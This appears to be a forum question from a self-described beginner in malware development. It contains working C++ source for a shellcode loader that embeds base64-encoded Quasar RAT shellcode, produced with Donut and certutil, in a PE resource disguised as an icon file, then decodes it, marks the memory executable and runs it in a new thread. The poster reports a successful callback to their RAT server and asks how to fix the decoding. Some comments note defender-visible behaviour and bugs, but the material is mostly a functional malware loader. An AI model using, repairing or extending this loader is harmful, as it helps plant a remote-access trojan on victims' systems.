I am new to malware development and I am trying to create a program that embeds raw shellcode in the resource section of a PE and injects it into memory.
Using Donut by Wover (https://github.com/TheWover/donut), I convert the executable Quasar RAT into a raw shellcode using this command donut.exe -i Client-built.exe -a x64 and subsequently encode it to base64 using certutil by this command: certutil -encode loader.bin loader.b64 in the windows command prompt.
main.cpp:
#include <windows.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <Wincrypt.h>
#pragma comment (lib, "Crypt32.lib")
#define SC_ICON 2583
// Resource-embedded loader: reads RCDATA resource SC_ICON, base64-decodes it
// into a freshly allocated RW region, flips that region to RX and starts a
// thread at its base. From a defender's view, the RW->RX VirtualProtect on a
// private allocation followed by CreateThread at that address is the sequence
// that memory scanners and behavioural monitoring key on.
int main() {
HANDLE hthread;
// None of the resource lookups are checked; a NULL HRSRC propagates into
// LoadResource/LockResource/SizeofResource (size 0) without any error.
HRSRC shellcode = FindResourceW(0, MAKEINTRESOURCEW(SC_ICON), RT_RCDATA);
HGLOBAL shellcode_handle = LoadResource(0, shellcode);
LPVOID shellcode_payload = LockResource(shellcode_handle);
// Size of the resource as stored, i.e. the base64 text, not the decoded bytes.
DWORD shellcode_size = SizeofResource(0, shellcode);
printf("[+] Allocating shellcode to memory...\n");
// Sized by the encoded length, so larger than the decoded output needs;
// the return value is not checked for NULL.
LPVOID pAddress = VirtualAlloc(0, shellcode_size, MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE);
printf("[+] Shellcode base address: 0x%p\n", shellcode_payload);
printf("[+] Allocated memory base address: 0x%p\n", pAddress);
printf("[+] Press enter to decode base64 shellcode & copy shellcode to allocated memory\n");
getchar();
// shellcode_size is passed both as the input string length (cchString) and
// as the in/out buffer size (pcbBinary), so after the call it holds the
// decoded byte count. The BOOL result is ignored, so a decode failure is
// silent and the buffer is handed on to VirtualProtect/CreateThread anyway.
CryptStringToBinaryA((LPCSTR)shellcode_payload, shellcode_size, CRYPT_STRING_BASE64, (BYTE*)pAddress, &shellcode_size, 0, 0);
printf("[+] Successfully copied shellcode to memory: 0x%p\n", pAddress);
DWORD old_protection = 0;
// RW -> RX transition on the private allocation; return value unchecked.
VirtualProtect(pAddress, shellcode_size, PAGE_EXECUTE_READ, &old_protection);
hthread = CreateThread(0, 0, (LPTHREAD_START_ROUTINE)pAddress, 0, 0, 0);
if (!hthread) {
// Only logs; execution falls through and the NULL handle is passed to
// GetProcessIdOfThread and WaitForSingleObject below.
printf("[+] failed to start thread!");
}
// pid is a DWORD but is printed with %d; %lu would match the type.
DWORD pid = GetProcessIdOfThread(hthread);
printf("[+] Process - PID: %d started !\n", pid);
// Blocks until the payload thread exits. hthread is never closed with
// CloseHandle, and main ends without an explicit return (implicitly 0 in C++).
WaitForSingleObject(hthread, INFINITE);
}
rsrc.rc:
// Resource id must match the SC_ICON value that main.cpp passes to FindResourceW.
#define SC_ICON 2583
// Stored as RCDATA (RT_RCDATA), so the file's bytes are embedded as-is.
SC_ICON RCDATA "loader_b64.ico"
loader_b64.ico:
Although I successfully managed to get a callback to my Quasar RAT server, some of the functions of the RAT don't seem to be working properly. I know it has something to do with the shellcode being decoded from base64, but I couldn't find a fix for it. Is there a better way to decode the base64 shellcode?